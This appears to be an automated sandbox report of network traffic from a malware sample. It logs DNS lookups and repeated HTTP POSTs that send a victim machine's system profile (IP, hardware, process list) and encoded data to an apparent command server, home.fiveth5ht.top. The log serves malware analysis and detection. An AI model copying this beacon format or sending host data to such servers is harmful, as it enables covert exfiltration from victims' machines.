Dec 28, 2024 09:29:44.005045891 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.005091906 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.005100965 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.005182981 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.005198002 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.005239010 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.005249023 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.005356073 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.005405903 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.005492926 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.005511999 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.005628109 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.005637884 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.005675077 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.005685091 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.005742073 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.005758047 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.005877018 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.005886078 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.005930901 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.005958080 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.006004095 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.006059885 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.006133080 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.006145000 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.006180048 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.006221056 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.006275892 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.006285906 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.006300926 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.006397009 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.006412983 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.006426096 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.006472111 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.006521940 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.006572962 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.006583929 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.006616116 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.006673098 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.006727934 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.006737947 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.006783009 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.006793022 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.006835938 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.057015896 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.057029009 CET  80     49705  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.712327957 CET  49706  80     192.168.2.7    81.29.149.125
Dec 28, 2024 09:29:44.831842899 CET  80     49706  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:44.832977057 CET  49706  80     192.168.2.7    81.29.149.125
Dec 28, 2024 09:29:44.833379984 CET  49706  80     192.168.2.7    81.29.149.125
Dec 28, 2024 09:29:44.952824116 CET  80     49706  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:46.147330046 CET  80     49706  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:46.147391081 CET  80     49706  81.29.149.125  192.168.2.7
Dec 28, 2024 09:29:46.147500038 CET  49706  80     192.168.2.7    81.29.149.125
Dec 28, 2024 09:29:46.149295092 CET  49706  80     192.168.2.7    81.29.149.125
Dec 28, 2024 09:29:46.268693924 CET  80     49706  81.29.149.125  192.168.2.7
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Dec 28, 2024 09:29:35.319353104 CET  52866        53         192.168.2.7  1.1.1.1
Dec 28, 2024 09:29:35.319431067 CET  52866        53         192.168.2.7  1.1.1.1
Dec 28, 2024 09:29:35.459564924 CET  53           52866      1.1.1.1      192.168.2.7
Dec 28, 2024 09:29:35.459621906 CET  53           52866      1.1.1.1      192.168.2.7
Dec 28, 2024 09:29:39.857851028 CET  52869        53         192.168.2.7  1.1.1.1
Dec 28, 2024 09:29:39.858014107 CET  52869        53         192.168.2.7  1.1.1.1
Dec 28, 2024 09:29:40.684885025 CET  53           52869      1.1.1.1      192.168.2.7
Dec 28, 2024 09:29:40.688544989 CET  53           52869      1.1.1.1      192.168.2.7
Dec 28, 2024 09:29:42.363712072 CET  52871        53         192.168.2.7  1.1.1.1
Dec 28, 2024 09:29:42.363838911 CET  52871        53         192.168.2.7  1.1.1.1
Dec 28, 2024 09:29:42.504957914 CET  53           52871      1.1.1.1      192.168.2.7
Dec 28, 2024 09:29:42.505098104 CET  53           52871      1.1.1.1      192.168.2.7
Dec 28, 2024 09:29:44.561491966 CET  52873        53         192.168.2.7  1.1.1.1
Dec 28, 2024 09:29:44.561629057 CET  52873        53         192.168.2.7  1.1.1.1
Dec 28, 2024 09:29:44.706149101 CET  53           52873      1.1.1.1      192.168.2.7
Dec 28, 2024 09:29:44.706219912 CET  53           52873      1.1.1.1      192.168.2.7
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                Type            Class        DNS over HTTPS
Dec 28, 2024 09:29:35.319353104 CET  192.168.2.7  1.1.1.1  0xbdfe    Standard query (0)  httpbin.org         A (IP address)  IN (0x0001)  false
Dec 28, 2024 09:29:35.319431067 CET  192.168.2.7  1.1.1.1  0xedf9    Standard query (0)  httpbin.org         28              IN (0x0001)  false
Dec 28, 2024 09:29:39.857851028 CET  192.168.2.7  1.1.1.1  0x323     Standard query (0)  home.fiveth5ht.top  A (IP address)  IN (0x0001)  false
Dec 28, 2024 09:29:39.858014107 CET  192.168.2.7  1.1.1.1  0x74ee    Standard query (0)  home.fiveth5ht.top  28              IN (0x0001)  false
Dec 28, 2024 09:29:42.363712072 CET  192.168.2.7  1.1.1.1  0x37c5    Standard query (0)  home.fiveth5ht.top  A (IP address)  IN (0x0001)  false
Dec 28, 2024 09:29:42.363838911 CET  192.168.2.7  1.1.1.1  0x6bc3    Standard query (0)  home.fiveth5ht.top  28              IN (0x0001)  false
Dec 28, 2024 09:29:44.561491966 CET  192.168.2.7  1.1.1.1  0xec6c    Standard query (0)  home.fiveth5ht.top  A (IP address)  IN (0x0001)  false
Dec 28, 2024 09:29:44.561629057 CET  192.168.2.7  1.1.1.1  0xfc0c    Standard query (0)  home.fiveth5ht.top  28              IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                CName  Address         Type            Class        DNS over HTTPS
Dec 28, 2024 09:29:35.459621906 CET  1.1.1.1    192.168.2.7  0xbdfe    No error (0)  httpbin.org         -      3.218.7.103     A (IP address)  IN (0x0001)  false
Dec 28, 2024 09:29:35.459621906 CET  1.1.1.1    192.168.2.7  0xbdfe    No error (0)  httpbin.org         -      34.226.108.155  A (IP address)  IN (0x0001)  false
Dec 28, 2024 09:29:40.684885025 CET  1.1.1.1    192.168.2.7  0x323     No error (0)  home.fiveth5ht.top  -      81.29.149.125   A (IP address)  IN (0x0001)  false
Dec 28, 2024 09:29:42.505098104 CET  1.1.1.1    192.168.2.7  0x37c5    No error (0)  home.fiveth5ht.top  -      81.29.149.125   A (IP address)  IN (0x0001)  false
Dec 28, 2024 09:29:44.706219912 CET  1.1.1.1    192.168.2.7  0xec6c    No error (0)  home.fiveth5ht.top  -      81.29.149.125   A (IP address)  IN (0x0001)  false
                                                          • httpbin.org
                                                          • home.fiveth5ht.top
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.7  49704        81.29.149.125   80                7584  C:\Users\user\Desktop\xdeRtWCeNH.exe
Timestamp                            Bytes transferred  Direction  Data
Dec 28, 2024 09:29:40.812309980 CET  12360              OUT        POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
Host: home.fiveth5ht.top
Accept: */*
Content-Type: application/json
Content-Length: 501307
Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 39 38 32 31 37 36 35 32 39 31 34 30 37 35 33 37 36 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
Data Ascii: { "ip": "8.46.123.189", "current_time": "8598217652914075376", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 632 }, { "name": "svchost.exe", "pid": 748 }, { "name": "fontdrvhost.exe", "pid": 772 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "svchost.exe", "pid": 864 }, { "name": "svchost.exe", "pid": 912 }, { "name": "dwm.exe", "pid": 976 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 704 }, { "name": "svchost.exe", "pid": 860 }, { "name": "svchost.exe" [TRUNCATED]
Dec 28, 2024 09:29:40.932890892 CET  2472               OUT        Data Raw: 6e 38 50 35 69 6f 61 74 62 57 59 5a 35 2b 70 5c 2f 2b 75 61 6a 66 37 70 5c 2f 44 2b 59 72 6f 4f 55 68 6f 71 58 61 66 37 78 5c 2f 7a 2b 4e 50 6f 41 69 32 48 32 5c 2f 7a 2b 46 47 77 2b 33 2b 66 77 72 39 59 39 4e 5c 2f 34 4a 53 5c 2f 45 50 56 4e 50
Data Ascii: n8P5ioatbWYZ5+p\/+uajf7p\/D+YroOUhoqXaf7x\/z+NPoAi2H2\/z+FGw+3+fwr9Y9N\/4JS\/EPVNP0bUrX4g2tza63pmmanbTWXg2+u4Ik1O0iuoobiVddQW8qeaIGM6wq8q4iLqyFtWT\/AIJJ\/EG1wdQ+IjaepGd9z8OdZjiwOpWV9cWNtoILYb5QRnGVz\/HOI+n79EzC\/WHX8UsVGnhcRXwlfER8OfFWrhYYjDTd
Dec 28, 2024 09:29:40.932923079 CET  4944               OUT        Data Raw: 77 44 7a 7a 48 2b 66 77 70 4b 44 53 6e 31 2b 58 36 6b 63 6e 62 38 66 36 56 48 55 72 4e 6a 67 64 66 35 66 5c 2f 58 71 4b 67 36 4b 66 58 35 42 56 65 72 46 52 73 76 63 66 6a 5c 2f 6a 51 61 45 64 56 36 6d 5c 2f 6a 5c 2f 77 43 41 5c 2f 77 42 61 52 2b
Data Ascii: wDzzH+fwpKDSn1+X6kcnb8f6VHUrNjgdf5f\/XqKg6KfX5BVerFRsvcfj\/jQaEdV6m\/j\/wCA\/wBaR+n4\/wBDQaU+vy\/UiooqOTt+P9KDQjooooOgjk7fj\/So6kk7fj\/So6AI5O341HUr9Px\/xqKg6COTt+P9Khl7\/wC9\/jVqoW6ffz\/n8R+dBpT6\/L9SrRViq9aU+vy\/U6KfX5fqQv8AeP4fyFNqxVdt5PCfl
Dec 28, 2024 09:29:40.932946920 CET  2472               OUT        Data Raw: 66 44 42 34 43 6c 53 6a 4a 34 7a 47 30 6f 4b 6e 66 5c 2f 72 6c 7a 62 69 6a 4e 2b 43 65 47 2b 45 4f 49 63 69 6c 6e 2b 44 7a 47 64 44 4c 73 76 71 35 70 77 35 6a 71 65 57 59 5c 2f 41 5a 66 58 79 76 32 6d 49 71 56 38 58 5c 2f 61 57 57 59 71 65 44 76
Data Ascii: fDB4ClSjJ4zG0oKnf\/rlzbijN+CeG+EOIciln+DzGdDLsvq5pw5jqeWY\/AZfXyv2mIqV8X\/aWWYqeDvShGphcvni8fXnKMMPga75+WbU\/wBlS20uzfUfhx8bfj34Vv8Ay7d9E\/4SP4reLPjL4bivHkT+zYtY8N\/HC9+IranoE11JENZ0yw1XQrqbT5buLSr\/AEi8NreW3yt8e\/h1+z58Wf2V\/wBoz4k6t8B\/h14O+
Dec 28, 2024 09:29:40.932969093 CET  2472               OUT        Data Raw: 74 62 31 78 37 6e 78 35 34 77 30 4f 66 54 46 31 32 38 76 50 73 6e 32 4f 33 74 6f 6e 63 33 44 53 78 66 77 6c 34 6d 30 76 42 76 69 4c 6a 2b 71 76 45 48 67 76 47 35 6a 78 46 4c 4f 38 42 77 7a 69 73 30 6a 6e 65 63 34 4b 68 53 79 72 2b 78 63 6e 78 32
Data Ascii: tb1x7nx54w0OfTF128vPsn2O3tonc3DSxfwl4m0vBviLj+qvEHgvG5jxFLO8Bwzis0jnec4KhSyr+xcnx2XZ1Uw+WZpgsPDASxefYHI9KCr\/ANoVOWpUm+VP\/a3wvyTi7gXgallvh1nOHyjhungcbn+HyyWEw2YVamZ1syx+Gx+Ajis3w+PxUsW6GVYjM+V4h0I4SN6VOmua31T+xF\/wXHtf2xf2l\/h9+zpcfsy3Hw2m+IN
Dec 28, 2024 09:29:40.933268070 CET  4944               OUT        Data Raw: 62 73 2b 76 2b 66 77 34 5c 2f 79 61 5a 4b 33 37 76 65 5c 2f 77 44 33 38 5c 2f 7a 30 35 78 5c 2f 68 55 33 2b 73 5c 2f 6a 5c 2f 37 5a 5c 2f 38 41 31 76 35 66 79 70 6a 44 64 49 37 37 49 38 66 35 5c 2f 44 6e 6e 5c 2f 77 44 58 51 61 46 62 62 75 6a 35
Data Ascii: bs+v+fw4\/yaZK37ve\/wD38\/z05x\/hU3+s\/j\/7Z\/8A1v5fypjDdI77I8f5\/Dnn\/wDXQaFbbuj5Pl9oovN\/5ePx\/p37VC3yKjumU6+Z5X4\/\/qq0h2\/u\/wDpl5vmc\/5\/z0pG\/wBZ\/sGL\/Vx5\/wA9u9BpT6\/L9Stt\/j6enmS\/jVZv4XzGH\/1v+f5\/5NWWXdwPnfiKKTr532P0\/D8qY0fL\/wAf+f
Dec 28, 2024 09:29:40.933316946 CET  4944               OUT        Data Raw: 41 6e 78 4a 38 4e 76 64 6e 59 48 66 46 75 75 6f 47 55 37 46 5a 38 4a 38 6f 4a 77 4b 5c 2f 43 53 76 36 48 50 2b 43 48 4c 34 38 4b 5c 2f 74 48 6a 4f 4d 65 49 50 68 65 65 75 4f 75 6e 65 4f 68 5c 2f 37 4c 58 38 75 5c 2f 53 2b 78 6c 66 42 2b 44 39 54
Data Ascii: AnxJ8NvdnYHfFuuoGU7FZ8J8oJwK\/CSv6HP+CHL48K\/tHjOMeIPheeuOuneOh\/7LX8u\/S+xlfB+D9TGYWXssThOK+GcVh6mj9nXw2MnWpTs003GcIys007a6H9l\/QQw1HG+PeHwWJh7TDYzg3i3C4inr+8oYjA0qVWF001z05Si2mmk7rU9V\/YZ1bwh+0p+xf4y\/YJ+NSz+E\/i38GvDOv\/AAD+LfgQzW1j4n0vRNKu
Dec 28, 2024 09:29:40.933363914 CET  2472               OUT        Data Raw: 35 78 55 50 6d 50 5c 2f 45 6c 7a 5c 2f 72 66 4e 5c 2f 77 42 62 2b 34 5c 2f 7a 39 4b 32 39 5c 2f 77 44 75 5c 2f 69 41 7a 43 66 50 38 38 6e 5c 2f 50 4b 58 7a 4f 6d 50 38 41 50 2b 65 39 50 2b 37 38 6e 37 76 79 5c 2f 77 44 56 48 45 76 74 5c 2f 6e 32
Data Ascii: 5xUPmP\/Elz\/rfN\/wBb+4\/z9K29\/wDu\/iAzCfP88n\/PKXzOmP8AP+e9P+78n7vy\/wDVHEvt\/n2waFkMe9tgd\/8AVf8A6\/8APvTGkT53dLff28zmCqAZ5jyHfst\/3f5zf57j39qfJvk3v\/qfKi83\/j68\/wA71uvf\/wDVUMi7pNm\/enMsX7o\/zp\/mfcH3+fK94bfH\/Hr\/ANeP8+Otc50BH\/rPO2b3k\/
Dec 28, 2024 09:29:41.052576065 CET  7416               OUT        Data Raw: 2b 45 48 6a 76 77 62 6f 76 38 41 61 61 5c 2f 45 58 77 70 70 75 6e 61 74 34 5c 2f 38 41 47 50 67 76 52 6d 31 50 55 64 6c 35 71 46 6e 59 77 79 33 36 2b 4c 65 48 76 69 74 34 47 38 51 32 75 6b 7a 57 6e 69 5c 2f 77 69 39 5c 2f 65 77 61 70 5c 2f 62 66
Data Ascii: +EHjvwbov8Aaa\/EXwppunat4\/8AGPgvRm1PUdl5qFnYwy36+LeHvit4G8Q2ukzWni\/wi9\/ewap\/bfh5NT1e317wXqmlavf6VLoXieLXPDuh6TLqU62S6lDJ4V1jxRpkdjeW8N7qNpq8V9pdn+jZX4gcAVs3r8IZRneWrNMorf2fWyfCUK1GOCqUaKqyoRUMNDCU6WHpulGrKnP2GHnXwlCpKnVxeFp1fyPN\/C3xQo5BQ4
Dec 28, 2024 09:29:41.052685022 CET  7416               OUT        Data Raw: 76 38 50 53 6e 79 53 66 75 39 69 4a 5c 2f 71 5c 2f 77 44 6c 70 5c 2f 6e 36 66 30 36 44 6d 51 37 5c 2f 41 44 4e 6e 4c 5c 2f 5a 5c 2f 37 5c 2f 34 66 6a 56 58 64 74 5c 2f 6a 2b 63 63 64 66 5c 2f 4a 72 5c 2f 41 44 36 5c 2f 68 57 68 59 38 73 5c 2f 4b
Data Ascii: v8PSnySfu9iJ\/q\/wDlp\/n6f06DmQ7\/ADNnL\/Z\/7\/4fjVXdt\/j+ccdf\/Jr\/AD6\/hWhY8s\/Kf9+pJP8AP+f1qH5\/L3n5Py6\/9On8qf8A6wD5P3X\/ACy7\/wCeD+eahXP3D\/pKf9df38P4c\/yrnOvnfl\/XzGTfd+SP5\/8AVS\/9Nv8APXp6fjCyp5jlPnj\/ANV5n\/Lf\/PX9Kvt\/A\/7x\/Ll\/dc9\/
Dec 28, 2024 09:29:41.097570896 CET  27192              OUT        Data Raw: 6d 55 32 57 75 36 72 4c 62 78 7a 51 61 64 63 57 56 6a 39 4b 74 70 57 6c 73 6b 55 62 61 5a 70 37 52 77 6e 4d 4d 62 57 64 75 55 69 50 72 45 70 6a 32 78 6e 33 51 43 6d 79 61 50 70 45 71 4e 48 4c 70 57 6d 79 52 75 4d 4f 6b 6c 6a 61 75 6a 44 30 5a 57
Data Ascii: mU2Wu6rLbxzQadcWVj9KtpWlskUbaZp7RwnMMbWduUiPrEpj2xn3QCmyaPpEqNHLpWmyRuMOkljaujD0ZWiKsPYgiv5fqfQU4OnGqv9bM75q3D2G4ZnN06C58rocNY7huVKdOCjR9pXp42nmOIxEaUa1fMMryqdSTw+Gnhqv9n0v2kniDTfv8HZDUX9qZxmsXPFY6pUw+IzrNaOZYr6tVq1Z1o04U1jsHRo1alWnCjnObzkp18T


                                                          Session ID:1
                                                          Source IP:192.168.2.7
                                                          Source Port:49705
                                                          Destination IP:81.29.149.125
                                                          Destination Port:80
                                                          PID:7584
                                                          Process:C:\Users\user\Desktop\xdeRtWCeNH.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 28, 2024 09:29:42.634382010 CET | 12360 | OUT | POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                          Host: home.fiveth5ht.top
                                                          Accept: */*
                                                          Content-Type: application/json
                                                          Content-Length: 501307
                                                          Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 39 38 32 31 37 36 35 32 39 31 34 30 37 35 33 37 36 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                                          Data Ascii: { "ip": "8.46.123.189", "current_time": "8598217652914075376", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 632 }, { "name": "svchost.exe", "pid": 748 }, { "name": "fontdrvhost.exe", "pid": 772 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "svchost.exe", "pid": 864 }, { "name": "svchost.exe", "pid": 912 }, { "name": "dwm.exe", "pid": 976 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 704 }, { "name": "svchost.exe", "pid": 860 }, { "name": "svchost.exe" [TRUNCATED]
                                                          Dec 28, 2024 09:29:42.754112959 CET | 4944 | OUT | Data Raw: 6e 38 50 35 69 6f 61 74 62 57 59 5a 35 2b 70 5c 2f 2b 75 61 6a 66 37 70 5c 2f 44 2b 59 72 6f 4f 55 68 6f 71 58 61 66 37 78 5c 2f 7a 2b 4e 50 6f 41 69 32 48 32 5c 2f 7a 2b 46 47 77 2b 33 2b 66 77 72 39 59 39 4e 5c 2f 34 4a 53 5c 2f 45 50 56 4e 50
                                                          Data Ascii: n8P5ioatbWYZ5+p\/+uajf7p\/D+YroOUhoqXaf7x\/z+NPoAi2H2\/z+FGw+3+fwr9Y9N\/4JS\/EPVNP0bUrX4g2tza63pmmanbTWXg2+u4Ik1O0iuoobiVddQW8qeaIGM6wq8q4iLqyFtWT\/AIJJ\/EG1wdQ+IjaepGd9z8OdZjiwOpWV9cWNtoILYb5QRnGVz\/HOI+n79EzC\/WHX8UsVGnhcRXwlfER8OfFWrhYYjDTd
                                                          Dec 28, 2024 09:29:42.754160881 CET | 4944 | OUT | Data Raw: 7a 5c 2f 38 41 58 77 44 31 70 5c 2f 38 41 73 54 66 4a 35 6e 2b 74 5c 2f 64 66 76 78 31 5c 2f 7a 6e 5c 2f 36 2b 51 43 6d 32 36 53 56 33 5c 2f 77 43 6d 76 6d 6e 31 36 5c 2f 35 5c 2f 6e 36 30 7a 35 5c 2f 6b 33 5c 2f 4a 36 65 5a 46 64 66 35 34 37 66
                                                          Data Ascii: z\/8AXwD1p\/8AsTfJ5n+t\/dfvx1\/zn\/6+QCm26SV3\/wCmvmn16\/5\/n60z5\/k3\/J6eZFdf547frU0cXmeSjp+56+ZJEfP\/AM\/h7euXyfx\/35JfK3yf8tu3+QKC4b\/L9UQs23f8+\/zYrfzfLyM\/6V+P17UyT93\/AB7z\/rf3f7j3p+0qyJ+7\/dy\/9\/v9F\/z9TUO55F+T91wIvLH7\/wD\/AIL\/AD1oNR
                                                          Dec 28, 2024 09:29:42.754192114 CET | 2472 | OUT | Data Raw: 74 62 31 78 37 6e 78 35 34 77 30 4f 66 54 46 31 32 38 76 50 73 6e 32 4f 33 74 6f 6e 63 33 44 53 78 66 77 6c 34 6d 30 76 42 76 69 4c 6a 2b 71 76 45 48 67 76 47 35 6a 78 46 4c 4f 38 42 77 7a 69 73 30 6a 6e 65 63 34 4b 68 53 79 72 2b 78 63 6e 78 32
                                                          Data Ascii: tb1x7nx54w0OfTF128vPsn2O3tonc3DSxfwl4m0vBviLj+qvEHgvG5jxFLO8Bwzis0jnec4KhSyr+xcnx2XZ1Uw+WZpgsPDASxefYHI9KCr\/ANoVOWpUm+VP\/a3wvyTi7gXgallvh1nOHyjhungcbn+HyyWEw2YVamZ1syx+Gx+Ajis3w+PxUsW6GVYjM+V4h0I4SN6VOmua31T+xF\/wXHtf2xf2l\/h9+zpcfsy3Hw2m+IN
                                                          Dec 28, 2024 09:29:42.754236937 CET | 2472 | OUT | Data Raw: 62 73 2b 76 2b 66 77 34 5c 2f 79 61 5a 4b 33 37 76 65 5c 2f 77 44 33 38 5c 2f 7a 30 35 78 5c 2f 68 55 33 2b 73 5c 2f 6a 5c 2f 37 5a 5c 2f 38 41 31 76 35 66 79 70 6a 44 64 49 37 37 49 38 66 35 5c 2f 44 6e 6e 5c 2f 77 44 58 51 61 46 62 62 75 6a 35
                                                          Data Ascii: bs+v+fw4\/yaZK37ve\/wD38\/z05x\/hU3+s\/j\/7Z\/8A1v5fypjDdI77I8f5\/Dnn\/wDXQaFbbuj5Pl9oovN\/5ePx\/p37VC3yKjumU6+Z5X4\/\/qq0h2\/u\/wDpl5vmc\/5\/z0pG\/wBZ\/sGL\/Vx5\/wA9u9BpT6\/L9Stt\/j6enmS\/jVZv4XzGH\/1v+f5\/5NWWXdwPnfiKKTr532P0\/D8qY0fL\/wAf+f
                                                          Dec 28, 2024 09:29:42.754290104 CET | 4944 | OUT | Data Raw: 52 66 34 5c 2f 72 36 64 36 49 34 33 5a 6e 52 49 64 6a 6a 39 7a 5c 2f 72 50 38 38 2b 6e 48 70 55 2b 31 38 35 66 31 38 77 49 66 6b 6a 32 50 2b 38 5c 2f 64 5c 2f 76 63 79 66 36 69 62 5c 2f 50 39 61 4a 50 6c 62 5c 2f 56 5c 2f 36 79 58 39 37 5c 2f 79
                                                          Data Ascii: Rf4\/r6d6I43ZnRIdjj9z\/rP88+nHpU+185f18wIfkj2P+8\/d\/vcyf6ib\/P9aJPlb\/V\/6yX97\/yw\/wA+lHlpu2bPnki\/5Z\/8scn\/ADn609t8e\/d+8\/e+bN5cX+u\/z9O+fSj2vnL+vmdB+80lnDIPkm2P\/wA85D9fwz\/niqMmny\/3Dt5xwO\/uT\/QmrH8f\/Av61ZWR\/wCB\/wDPv\/8AXrE\/yP8AaVK
                                                          Dec 28, 2024 09:29:42.754347086 CET | 2472 | OUT | Data Raw: 4b 68 52 34 55 7a 61 46 4b 6d 6e 4a 71 45 56 6d 38 4c 4a 4f 54 63 6e 76 31 62 5a 58 6f 71 53 54 74 2b 4e 52 31 5c 2f 64 42 5c 2f 6e 57 46 56 36 73 56 45 5c 2f 58 38 50 36 6d 67 42 6c 52 2b 58 37 5c 2f 70 5c 2f 39 65 70 4b 4b 44 6f 4b 39 46 53 53
